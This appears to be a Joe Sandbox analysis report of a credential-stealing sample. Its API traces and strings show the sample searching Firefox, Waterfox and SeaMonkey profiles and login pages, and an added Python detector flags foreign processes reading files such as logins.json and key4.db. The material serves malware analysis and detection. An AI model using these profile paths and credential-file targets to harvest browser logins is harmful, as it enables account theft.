  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
• wcslen.MSVCRT ref: 0040C82C
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 2936932814-4196376884
• Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
• Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
• FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: BIN
• API String ID: 1668488027-1015027815
• Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
• Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

Control-flow Graph

APIs
• memset.MSVCRT ref: 00403CBF
• memset.MSVCRT ref: 00403CD4
• memset.MSVCRT ref: 00403CE9
• memset.MSVCRT ref: 00403CFE
• memset.MSVCRT ref: 00403D13
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                  • API String ID: 4039892925-11920434
                                                                                                                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                  • API String ID: 4039892925-2068335096
                                                                                                                                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                  • API String ID: 4039892925-3369679110
                                                                                                                                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
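The three blocks above share one skeleton: SHGetSpecialFolderPathW is asked for CSIDL 0x1A (CSIDL_APPDATA), a vendor-relative root from the String ID field (Waterfox\Profiles, Mozilla\SeaMonkey\Profiles, Mozilla\Firefox\Profiles) is appended with wcscpy/wcscat/_snwprintf, and the result is handed to the profile reader. The detector below is an added example written for this page, not code from the Joe Sandbox report or from the Remcos sample; it rebuilds the same %APPDATA%-relative directories and flags a non-browser process reading underneath them. The event lines, their field names, the allow-list of browser images and the list of credential files are assumptions constructed for the example; RegAsm.exe is used as the suspect image only because the memory dump these blocks come from is labelled RegAsm.

```python
"""
Added example, not part of the Joe Sandbox report or the Remcos sample:
flag a non-browser process that touches the Mozilla-family profile
directories named in the report's String ID fields.  Event lines, field
names, the browser allow-list and the credential-file list are constructed.
"""
import ntpath
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Relative roots copied from the String ID entries of the three blocks above.
# The sample resolves them under CSIDL_APPDATA (0x1A), the folder requested
# from SHGetSpecialFolderPathW in subcall 00414C2E.
PROFILE_ROOTS = (
    r"Waterfox\Profiles",
    r"Mozilla\SeaMonkey\Profiles",
    r"Mozilla\Firefox\Profiles",
)

# Images that may legitimately open these directories (assumption).
BROWSER_IMAGES = {"firefox.exe", "waterfox.exe", "seamonkey.exe"}

# Profile files holding credentials or session material (assumption; the
# report does not name which files the sample opens).
CREDENTIAL_FILES = {"logins.json", "key4.db", "key3.db", "signons.sqlite", "cookies.sqlite"}


@dataclass(frozen=True)
class FileEvent:
    image: str     # full path of the process that opened the file
    target: str    # path that was opened
    appdata: str   # %APPDATA% of the user the process runs as


def profile_dirs(appdata: str) -> List[str]:
    """Absolute profile directories, built as the sample does: CSIDL_APPDATA + relative root."""
    return [ntpath.join(appdata, root) for root in PROFILE_ROOTS]


def parse_event(line: str) -> FileEvent:
    """Parse one constructed 'Key=Value|Key=Value' file-access event line."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return FileEvent(fields["Image"], fields["TargetFilename"], fields["AppData"])


def classify(ev: FileEvent) -> Optional[str]:
    """'high' / 'medium' for a non-browser process inside a profile dir, else None."""
    target = ntpath.normcase(ev.target)            # lower-case, backslash-normalised
    inside = any(
        target == ntpath.normcase(d) or target.startswith(ntpath.normcase(d) + "\\")
        for d in profile_dirs(ev.appdata)
    )
    if not inside:
        return None
    if ntpath.basename(ev.image).lower() in BROWSER_IMAGES:
        return None                                # the browser itself is expected here
    if ntpath.basename(target) in CREDENTIAL_FILES:
        return "high"                              # credential store read by a foreign process
    return "medium"                                # profile directory enumerated by a foreign process


def scan(lines: List[str]) -> List[Tuple[str, FileEvent]]:
    """Run classify() over event lines and return (severity, event) for every hit."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        severity = classify(ev)
        if severity:
            hits.append((severity, ev))
    return hits


# Constructed events: one stealer read of logins.json, the same read by the
# browser, a directory open of the Waterfox profile root, and an unrelated file.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe|TargetFilename=C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1y2z3.default\logins.json|AppData=C:\Users\alice\AppData\Roaming",
    r"Image=C:\Program Files\Mozilla Firefox\firefox.exe|TargetFilename=C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1y2z3.default\logins.json|AppData=C:\Users\alice\AppData\Roaming",
    r"Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe|TargetFilename=C:\Users\alice\AppData\Roaming\Waterfox\Profiles|AppData=C:\Users\alice\AppData\Roaming",
    r"Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe|TargetFilename=C:\Users\alice\Documents\invoice.docx|AppData=C:\Users\alice\AppData\Roaming",
]

if __name__ == "__main__":
    for severity, ev in scan(SAMPLE_EVENTS):
        print(severity, ntpath.basename(ev.image), ev.target)
```

Matching on the resolved directory rather than on the literal vendor string is deliberate: the sample only ever holds the relative root and lets CSIDL_APPDATA supply the user-specific prefix, so a rule keyed on a fixed C:\Users\... path would miss redirected or roaming profiles. The allow-list is the weak point of any such rule, since a stealer injected into the browser process itself would pass it; treat it as a triage filter, not a verdict.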
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                  • free.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: CreateErrorFileLastfree
• String ID: |A
• API String ID: 981974120-1717621600
• Opcode ID: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
• String ID: $0.@
• API String ID: 2758756878-1896041820
• Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
• Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
APIs
• memset.MSVCRT ref: 00403C09
• memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
• wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
• wcscat.MSVCRT ref: 00403C70
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 1534475566-1174173950
• Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
• Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
• Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
• Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
APIs
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 669240632-0
• Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
• Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
• Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
• Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
APIs
• SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
• memset.MSVCRT ref: 00414C87
• RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseFolderPathSpecialVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 2925649097-2036018995
• Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
• Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
• Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
• Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
APIs
• wcschr.MSVCRT ref: 00414458
• _snwprintf.MSVCRT ref: 0041447D
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
• GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"
• API String ID: 1343145685-3297466227
• Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
• Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
• Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
• Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
APIs
• memset.MSVCRT ref: 004087D6
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
• memset.MSVCRT ref: 00408828
• memset.MSVCRT ref: 00408840
• memset.MSVCRT ref: 00408858
• memset.MSVCRT ref: 00408870
• memset.MSVCRT ref: 00408888
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0
• Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
• Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
• Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
• Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
• Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
• Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
